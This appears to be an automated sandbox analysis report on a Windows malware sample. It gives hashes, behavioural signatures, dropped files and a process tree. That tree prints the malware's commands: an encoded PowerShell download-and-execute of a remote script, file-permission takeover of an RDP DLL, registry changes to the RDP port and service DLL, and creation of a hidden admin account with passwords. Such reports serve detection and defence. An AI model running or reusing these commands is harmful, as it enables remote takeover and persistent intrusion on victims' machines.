Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
17-11-2020 12:38
General
-
Target
09fd827d8b404557a5c9e06810247c12.exe
-
Size
3.4MB
-
MD5
afb57d5d065aaa204e8a5c6803bab72b
-
SHA1
5cd785582bba69f740a8943c02123e683a541b3b
-
SHA256
3126cbdac814b04d544ff02e968d2143b231bb6d981ff8bf1812f6314cca187e
-
SHA512
40bfdc844abc2f49e810ac63e6e6b739aa656830d3833292dd1b43456a8452aa7181d675e28e4f4bf0f920009e35b0d631ec39a25968f12b7335528c41181f98
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 41 IoCs
-
Modifies data under HKEY_USERS 60 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 127 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp" "c:\Users\Admin\AppData\Local\Temp\yhohqbpl\CSC29A543AFC00E4EA59E5227AB87A5CD7.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin aq7RmA6J /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin aq7RmA6J /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin aq7RmA6J /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin aq7RmA6J1⤵
-
C:\Windows\system32\net.exenet.exe user updwin aq7RmA6J2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin aq7RmA6J3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES63B2.tmpMD5
b94dbc7fc42030c383cd5e85235df22c
SHA1edfeb52fc61d5c89c7823ab13197d54f6540af5b
SHA256b608e81dd78246c1a0e6c75a4c2fe012463c24e475c36c112ec585d45f782e9e
SHA51227715771c4dc60715b96f67be28d269fa3242a84501c5c2fec0ca034181a86f08ca1235f3a3b3ea5a9a22b565b59e949c3be5810a8347965f9f9f9015491d255
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.dllMD5
7e3b26b4e548b718ac01a4a813b7bbec
SHA14baa37135516e271433ebf733f1bb88653ae8677
SHA256667b9ac53a020cdfa105ef9a8f816221696a98d3a353c276ba02d35942e7829d
SHA512e56602f602bee78cfb3675755dc4db3f191b7944ad467d358f8c942762c8f0a05f5287795c30271fb78977bb117db7a59468f323d9ed9741c01d55c1dfa74200
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\CSC29A543AFC00E4EA59E5227AB87A5CD7.TMPMD5
870893bd2875d881b5c35c83d5c54938
SHA17423aa725edbe59686aebcc032f4f0e797b2b2c4
SHA25660902d9a170fb53d2c0113a4b4d9784542ece5e90c1f6c11aa30734c7a5e0749
SHA512c0a6e2d8232b5a567dbc9ce152943656484867357836ae199e4a9ff74b8b5c3430389c9c15c29c1f6944bda738dfb182320d46c051b244ab79c67d126abced39
-
\??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.cmdlineMD5
ec18c212f2cc954258b70bc21d1678eb
SHA1232c273f68e5a8cc019b48a89b9e9281b18ad4a7
SHA256682232b6bcc5beeea301620c7e76708a25b02eed5b82e3cbba9c038e2b90a34e
SHA512a75d4552063755e39aeb1bd1b6b56f44d638c8197bf4a21149f72e9e87a40a899919915d7a3ebafc256f6f6e374ccef2431d4716b18882add9c98cb9c5be27a1
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/272-40-0x0000000000000000-mapping.dmp
-
memory/340-46-0x0000000000000000-mapping.dmp
-
memory/528-54-0x0000000000000000-mapping.dmp
-
memory/572-68-0x0000000000000000-mapping.dmp
-
memory/572-53-0x0000000000000000-mapping.dmp
-
memory/640-81-0x0000000000000000-mapping.dmp
-
memory/704-61-0x0000000000000000-mapping.dmp
-
memory/792-86-0x0000000019450000-0x0000000019451000-memory.dmpFilesize
4KB
-
memory/792-111-0x000000001ACA0000-0x000000001ACA1000-memory.dmpFilesize
4KB
-
memory/792-93-0x00000000010E0000-0x00000000010E1000-memory.dmpFilesize
4KB
-
memory/792-110-0x0000000019490000-0x0000000019491000-memory.dmpFilesize
4KB
-
memory/792-76-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmpFilesize
9.9MB
-
memory/792-75-0x0000000000000000-mapping.dmp
-
memory/792-94-0x0000000000F90000-0x0000000000F91000-memory.dmpFilesize
4KB
-
memory/792-102-0x0000000001210000-0x0000000001211000-memory.dmpFilesize
4KB
-
memory/792-92-0x0000000000F80000-0x0000000000F81000-memory.dmpFilesize
4KB
-
memory/792-91-0x0000000000B70000-0x0000000000B71000-memory.dmpFilesize
4KB
-
memory/792-103-0x000000001A1B0000-0x000000001A1B1000-memory.dmpFilesize
4KB
-
memory/792-95-0x0000000001100000-0x0000000001101000-memory.dmpFilesize
4KB
-
memory/992-57-0x0000000000000000-mapping.dmp
-
memory/1048-71-0x0000000000000000-mapping.dmp
-
memory/1080-55-0x0000000000000000-mapping.dmp
-
memory/1088-49-0x0000000000000000-mapping.dmp
-
memory/1152-41-0x0000000000000000-mapping.dmp
-
memory/1184-72-0x0000000000000000-mapping.dmp
-
memory/1184-62-0x0000000000000000-mapping.dmp
-
memory/1188-73-0x0000000000000000-mapping.dmp
-
memory/1188-42-0x0000000000000000-mapping.dmp
-
memory/1204-38-0x0000000000000000-mapping.dmp
-
memory/1288-56-0x0000000000000000-mapping.dmp
-
memory/1300-70-0x0000000000000000-mapping.dmp
-
memory/1300-36-0x0000000000000000-mapping.dmp
-
memory/1520-48-0x0000000000000000-mapping.dmp
-
memory/1576-82-0x0000000000000000-mapping.dmp
-
memory/1580-39-0x0000000000000000-mapping.dmp
-
memory/1596-45-0x0000000000000000-mapping.dmp
-
memory/1636-52-0x0000000000000000-mapping.dmp
-
memory/1644-47-0x0000000000000000-mapping.dmp
-
memory/1660-10-0x0000000000000000-mapping.dmp
-
memory/1672-51-0x0000000000000000-mapping.dmp
-
memory/1676-66-0x0000000000000000-mapping.dmp
-
memory/1684-50-0x0000000000000000-mapping.dmp
-
memory/1700-2-0x0000000000000000-mapping.dmp
-
memory/1700-35-0x000000001C280000-0x000000001C281000-memory.dmpFilesize
4KB
-
memory/1700-9-0x000000001B690000-0x000000001B691000-memory.dmpFilesize
4KB
-
memory/1700-3-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmpFilesize
9.9MB
-
memory/1700-4-0x0000000002280000-0x0000000002281000-memory.dmpFilesize
4KB
-
memory/1700-5-0x000000001AC20000-0x000000001AC21000-memory.dmpFilesize
4KB
-
memory/1700-7-0x0000000002480000-0x0000000002481000-memory.dmpFilesize
4KB
-
memory/1700-17-0x0000000001F20000-0x0000000001F21000-memory.dmpFilesize
4KB
-
memory/1700-18-0x0000000002550000-0x0000000002551000-memory.dmpFilesize
4KB
-
memory/1700-21-0x000000001B4D0000-0x000000001B4D1000-memory.dmpFilesize
4KB
-
memory/1700-6-0x0000000002340000-0x0000000002341000-memory.dmpFilesize
4KB
-
memory/1700-34-0x000000001A6B0000-0x000000001A6B1000-memory.dmpFilesize
4KB
-
memory/1700-33-0x0000000002620000-0x0000000002621000-memory.dmpFilesize
4KB
-
memory/1720-43-0x0000000000000000-mapping.dmp
-
memory/1736-64-0x0000000000000000-mapping.dmp
-
memory/1740-65-0x0000000000000000-mapping.dmp
-
memory/1740-44-0x0000000000000000-mapping.dmp
-
memory/1844-13-0x0000000000000000-mapping.dmp
-
memory/1844-69-0x0000000000000000-mapping.dmp
-
memory/1868-63-0x0000000000000000-mapping.dmp
-
memory/1916-60-0x0000000000000000-mapping.dmp
-
memory/1960-0-0x00000000010C0000-0x00000000013FD000-memory.dmpFilesize
3.2MB
-
memory/1960-1-0x0000000001400000-0x0000000001411000-memory.dmpFilesize
68KB
-
memory/2040-74-0x0000000000000000-mapping.dmp
-
memory/2040-67-0x0000000000000000-mapping.dmp
